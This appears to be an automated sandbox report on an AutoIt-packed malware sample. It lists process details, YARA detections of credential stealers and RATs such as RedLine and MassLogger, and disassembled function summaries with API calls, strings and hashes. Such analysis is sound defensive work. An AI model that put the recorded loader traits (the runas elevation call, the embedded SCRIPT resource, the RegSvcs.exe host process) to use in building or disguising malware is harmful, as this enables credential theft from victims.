MD5 hash:	30FB530DA7CF794B61893DF575122863
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000005.00000002.1650477461.00000000018E0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	19:14:35
Start date:	10/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\underbalance\porcelainization.exe"
Imagebase:	0xe90000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2747257139.0000000003631000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000006.00000002.2747119905.0000000003300000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2747119905.0000000003300000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.2747119905.0000000003300000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000002.2747119905.0000000003300000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.2747119905.0000000003300000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000006.00000002.2747119905.0000000003300000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	3.6%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	6.1%
Total number of Nodes:	2000
Total number of Limit Nodes:	176

Executed Functions

Function 00623B3A Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00623B68
IsDebuggerPresent.KERNEL32 ref: 00623B7A
GetFullPathNameW.KERNEL32(00007FFF,?,?,006E52F8,006E52E0,?,?), ref: 00623BEB

Part of subcall function 00627BCC: _memmove.LIBCMT ref: 00627C06

Part of subcall function 0063092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00623C14,006E52F8,?,?,?), ref: 0063096E

SetCurrentDirectoryW.KERNEL32(?), ref: 00623C6F
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,006D7770,00000010), ref: 0065D281
SetCurrentDirectoryW.KERNEL32(?,006E52F8,?,?,?), ref: 0065D2B9
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,006D4260,006E52F8,?,?,?), ref: 0065D33F
ShellExecuteW.SHELL32(00000000,?,?), ref: 0065D346

Part of subcall function 00623A46: GetSysColorBrush.USER32(0000000F), ref: 00623A50
Part of subcall function 00623A46: LoadCursorW.USER32(00000000,00007F00), ref: 00623A5F
Part of subcall function 00623A46: LoadIconW.USER32(00000063), ref: 00623A76
Part of subcall function 00623A46: LoadIconW.USER32(000000A4), ref: 00623A88
Part of subcall function 00623A46: LoadIconW.USER32(000000A2), ref: 00623A9A
Part of subcall function 00623A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00623AC0
Part of subcall function 00623A46: RegisterClassExW.USER32(?), ref: 00623B16

Part of subcall function 006239D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00623A03
Part of subcall function 006239D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00623A24
Part of subcall function 006239D5: ShowWindow.USER32(00000000,?,?), ref: 00623A38
Part of subcall function 006239D5: ShowWindow.USER32(00000000,?,?), ref: 00623A41

Part of subcall function 0062434A: _memset.LIBCMT ref: 00624370
Part of subcall function 0062434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00624415

Strings

This is a third-party compiled AutoIt script., xrefs: 0065D279
runas, xrefs: 0065D33A
%k, xrefs: 00623C44

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas$%k
API String ID: 529118366-1914796069
Opcode ID: d97292941e195bd6627a5d017c4a59293ae30bcb6a8c633aaeb0e854f27ec610
Instruction ID: 3fee73a7428dbe0ac516d198953b28adf7ccbb6fd652638a10ffac3335d93185
Opcode Fuzzy Hash: d97292941e195bd6627a5d017c4a59293ae30bcb6a8c633aaeb0e854f27ec610
Instruction Fuzzy Hash: A751E430E08AA8AECB11EBB4EC45EED7B7BAF45744F004069F512AA2A1DA745705CF25

Function 006249A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 006249CD

Part of subcall function 00627BCC: _memmove.LIBCMT ref: 00627C06

GetCurrentProcess.KERNEL32(?,006AFAEC,00000000,00000000,?), ref: 00624A9A
IsWow64Process.KERNEL32(00000000), ref: 00624AA1
GetNativeSystemInfo.KERNELBASE(00000000), ref: 00624AE7
FreeLibrary.KERNEL32(00000000), ref: 00624AF2
GetSystemInfo.KERNEL32(00000000), ref: 00624B23
GetSystemInfo.KERNEL32(00000000), ref: 00624B2F

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: 547a7c74393625f76c58ff5c07d335ff1d7de7655a788614557821cb092f4238
Instruction ID: 6b15441b278be5a30d0a23ed884d32f796045e02a5726e2a1d0a13a81d556f1d
Opcode Fuzzy Hash: 547a7c74393625f76c58ff5c07d335ff1d7de7655a788614557821cb092f4238
Instruction Fuzzy Hash: DC91D531989BD0DEC731DB6894501EABFF6AF2A301F4449ADD0C793B41D621A908CB5A

Function 00624E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00624D8E,?,?,00000000,00000000), ref: 00624E99
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00624D8E,?,?,00000000,00000000), ref: 00624EB0
LoadResource.KERNEL32(?,00000000,?,?,00624D8E,?,?,00000000,00000000,?,?,?,?,?,?,00624E2F), ref: 0065D937
SizeofResource.KERNEL32(?,00000000,?,?,00624D8E,?,?,00000000,00000000,?,?,?,?,?,?,00624E2F), ref: 0065D94C
LockResource.KERNEL32(00624D8E,?,?,00624D8E,?,?,00000000,00000000,?,?,?,?,?,?,00624E2F,00000000), ref: 0065D95F

Strings

SCRIPT, xrefs: 00624EA6

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: c7771c720f0ecbaf2e6e5a4a3397b1614e58e5d2bbb2d32d850f8b1add98226a
Instruction ID: 4827bdc8b9b7c5b21a080af63a9ab4e6eb0f2c107b2cc2ececbcf45d95b6e448
Opcode Fuzzy Hash: c7771c720f0ecbaf2e6e5a4a3397b1614e58e5d2bbb2d32d850f8b1add98226a
Instruction Fuzzy Hash: 98115A75240700BFE7219BA5EC48FA77BBBFBC6B11F214268F44686290DB61EC008E61

Function 0068445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,0065E398), ref: 0068446A
FindFirstFileW.KERNELBASE(?,?), ref: 0068447B
FindClose.KERNEL32(00000000), ref: 0068448B

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: a0cfda598c16333944a6fc1b9fb10070f9918db2a6fdaf88a124be736d6f11d4
Instruction ID: fc92d01870a464f0b64e686f43e2a7bfbea6a2430f34c9b1dc3483f3794f107d
Opcode Fuzzy Hash: a0cfda598c16333944a6fc1b9fb10070f9918db2a6fdaf88a124be736d6f11d4
Instruction Fuzzy Hash: 90E0D8324105016743107BB8EC0D5E97BDEDF06335F100715F835C11E0EBB46D009AD6

Function 006309D0 Relevance: 64.3, APIs: 27, Strings: 9, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00630A5B
timeGetTime.WINMM ref: 00630D16
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00630E53
Sleep.KERNEL32(0000000A), ref: 00630E61
LockWindowUpdate.USER32(00000000,?,?), ref: 00630EFA
DestroyWindow.USER32 ref: 00630F06
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00630F20
Sleep.KERNEL32(0000000A,?,?), ref: 00664E83
TranslateMessage.USER32(?), ref: 00665C60
DispatchMessageW.USER32(?), ref: 00665C6E
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00665C82

Strings

@GUI_CTRLHANDLE, xrefs: 00664FE4
pbn, xrefs: 006657B4
@GUI_CTRLID, xrefs: 00664F3A
pbn, xrefs: 00664F59
@GUI_WINHANDLE, xrefs: 00664F8F
@TRAY_ID, xrefs: 0066578F
pbn, xrefs: 00665003
@COM_EVENTOBJ, xrefs: 006654F0
pbn, xrefs: 00664FAE

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pbn$pbn$pbn$pbn
API String ID: 4212290369-1372581383
Opcode ID: a77c46576a942bc3e48ff50de6c6507c93bbfb9d9e8427c129a29cf3f9eedc58
Instruction ID: 9527dcbf540cb7ed306c6c1a39f604791558a0f6062ffcec61d7d0f2b7629632
Opcode Fuzzy Hash: a77c46576a942bc3e48ff50de6c6507c93bbfb9d9e8427c129a29cf3f9eedc58
Instruction Fuzzy Hash: DCB2CF70608B41DFD724DF24C895BAAB7E7BF85304F14491DE58A873A1CB71E889CB86

Function 00689155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00688F5F: __time64.LIBCMT ref: 00688F69

Part of subcall function 00624EE5: _fseek.LIBCMT ref: 00624EFD

__wsplitpath.LIBCMT ref: 00689234

Part of subcall function 006440FB: __wsplitpath_helper.LIBCMT ref: 0064413B

_wcscpy.LIBCMT ref: 00689247
_wcscat.LIBCMT ref: 0068925A
__wsplitpath.LIBCMT ref: 0068927F
_wcscat.LIBCMT ref: 00689295
_wcscat.LIBCMT ref: 006892A8

Part of subcall function 00688FA5: _memmove.LIBCMT ref: 00688FDE
Part of subcall function 00688FA5: _memmove.LIBCMT ref: 00688FED

_wcscmp.LIBCMT ref: 006891EF

Part of subcall function 00689734: _wcscmp.LIBCMT ref: 00689824
Part of subcall function 00689734: _wcscmp.LIBCMT ref: 00689837

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00689452
_wcsncpy.LIBCMT ref: 006894C5
DeleteFileW.KERNEL32(?,?), ref: 006894FB
CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00689511
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00689522
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00689534

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: 33db1f0d8901e6740c51f8c51add3029d65d9923c05be42389a68d8eb64c4afc
Instruction ID: f39653f42829abfa12f8c206b4a5a487a2b6abca1db98be9664f2eb2762ea869
Opcode Fuzzy Hash: 33db1f0d8901e6740c51f8c51add3029d65d9923c05be42389a68d8eb64c4afc
Instruction Fuzzy Hash: 6DC141B1D00119ABDF61EF95CC85AEEB7BEEF85310F0041AAF609E7141DB309A458F65

Function 00623015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00623074
RegisterClassExW.USER32(00000030), ref: 0062309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006230AF
InitCommonControlsEx.COMCTL32(?), ref: 006230CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006230DC
LoadIconW.USER32(000000A9), ref: 006230F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00623101

Strings

+, xrefs: 0062305D
TaskbarCreated, xrefs: 006230A4
AutoIt v3 GUI, xrefs: 00623090
0, xrefs: 00623056

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 6cb13191f34641b614e730f215a63f7ea16bd199fcc64b34c3600622d77e1e8e
Instruction ID: 91974da2e25a8f01a19e2e945ead3ab808fde5dd79837cdd82ed908bdbd2bd41
Opcode Fuzzy Hash: 6cb13191f34641b614e730f215a63f7ea16bd199fcc64b34c3600622d77e1e8e
Instruction Fuzzy Hash: 66315A71845354EFDB10DFE4E884A9ABFF2FB0A314F14516EE581EA2A0D3B55540CF91

Function 00623041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00623074
RegisterClassExW.USER32(00000030), ref: 0062309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006230AF
InitCommonControlsEx.COMCTL32(?), ref: 006230CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006230DC
LoadIconW.USER32(000000A9), ref: 006230F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00623101

Strings

+, xrefs: 0062305D
TaskbarCreated, xrefs: 006230A4
AutoIt v3 GUI, xrefs: 00623090
0, xrefs: 00623056

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: a573636607af37919fd90f21b46ec6c6df79b50d05cd26d08933c2a77f37ccbf
Instruction ID: c05a93e9e258d7ce924a7bfcdab44bb83239a7afe29c275bd48ec989f1939152
Opcode Fuzzy Hash: a573636607af37919fd90f21b46ec6c6df79b50d05cd26d08933c2a77f37ccbf
Instruction Fuzzy Hash: 1221E8B1911358AFDB00EFD4E888B9EBBF6FB09704F00512AF611AA2A0D7B155448F91

Function 0062708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00624706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,006E52F8,?,006237AE,?), ref: 00624724

Part of subcall function 0064050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00627165), ref: 0064052D

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 006271A8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0065E8C8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0065E909
RegCloseKey.ADVAPI32(?), ref: 0065E947
_wcscat.LIBCMT ref: 0065E9A0

Strings

Include, xrefs: 0065E8BF, 0065E900
Software\AutoIt v3\AutoIt, xrefs: 0062719E
\, xrefs: 0065E9C3
\Include\, xrefs: 00627165

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: 9f90a77abac4af1bc8cd5e695beabb113198fb12ebfc20c8492dd5e606102f96
Instruction ID: 416e3faf0cc0d1726386208e1bb2ab19321c4c96638a61d48031875986efe404
Opcode Fuzzy Hash: 9f90a77abac4af1bc8cd5e695beabb113198fb12ebfc20c8492dd5e606102f96
Instruction Fuzzy Hash: 6871E1715083519EC344EF25EC819ABBBEAFF55390F40192EF5458B2A0DB319A48CF96

Function 00623633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 006236D2
KillTimer.USER32(?,00000001), ref: 006236FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0062371F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0062372A
CreatePopupMenu.USER32 ref: 0062373E
PostQuitMessage.USER32(00000000), ref: 0062374D

Strings

%k, xrefs: 0065D081, 0065D0CF
TaskbarCreated, xrefs: 00623725

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated$%k
API String ID: 129472671-2455537126
Opcode ID: 7e3ce92318466a93f310683319e50b3b902db85da19a1e8496ea397a45325f1c
Instruction ID: b1c3f959b97093a158625909006c492ed4adf28c7de1e5b17929e083555dd54b
Opcode Fuzzy Hash: 7e3ce92318466a93f310683319e50b3b902db85da19a1e8496ea397a45325f1c
Instruction Fuzzy Hash: AD413BB1100E75BBDF246F64FC59BB93A5BEB01300F100129F5039A3E1DB699E069F6A

Function 00623A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00623A50
LoadCursorW.USER32(00000000,00007F00), ref: 00623A5F
LoadIconW.USER32(00000063), ref: 00623A76
LoadIconW.USER32(000000A4), ref: 00623A88
LoadIconW.USER32(000000A2), ref: 00623A9A
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00623AC0
RegisterClassExW.USER32(?), ref: 00623B16

Part of subcall function 00623041: GetSysColorBrush.USER32(0000000F), ref: 00623074
Part of subcall function 00623041: RegisterClassExW.USER32(00000030), ref: 0062309E
Part of subcall function 00623041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006230AF
Part of subcall function 00623041: InitCommonControlsEx.COMCTL32(?), ref: 006230CC
Part of subcall function 00623041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006230DC
Part of subcall function 00623041: LoadIconW.USER32(000000A9), ref: 006230F2
Part of subcall function 00623041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00623101

Strings

0, xrefs: 00623AF4
AutoIt v3, xrefs: 00623B05
#, xrefs: 00623AFB

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 94528747a93fbc6a056c074380563bbddc7598f121db2bb8e29fe01abbcfe067
Instruction ID: 0278d253f238d41dc8c8df19df68289978f710c8c30d0d1d13184a6845a8e492
Opcode Fuzzy Hash: 94528747a93fbc6a056c074380563bbddc7598f121db2bb8e29fe01abbcfe067
Instruction Fuzzy Hash: BC214B70D00754AFEB10DFA4EC89B9D7BB6FB08719F00112AF601AE2E1D7B596408F95

Function 00623766 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

/ErrorStdOut, xrefs: 0062387D
Rn, xrefs: 0065D213
>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 006237AE
CMDLINE, xrefs: 00623822
/AutoIt3ExecuteLine, xrefs: 006238A7
/AutoIt3ExecuteScript, xrefs: 006238BC
CMDLINERAW, xrefs: 006237FB
/AutoIt3OutputDebug, xrefs: 00623892

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

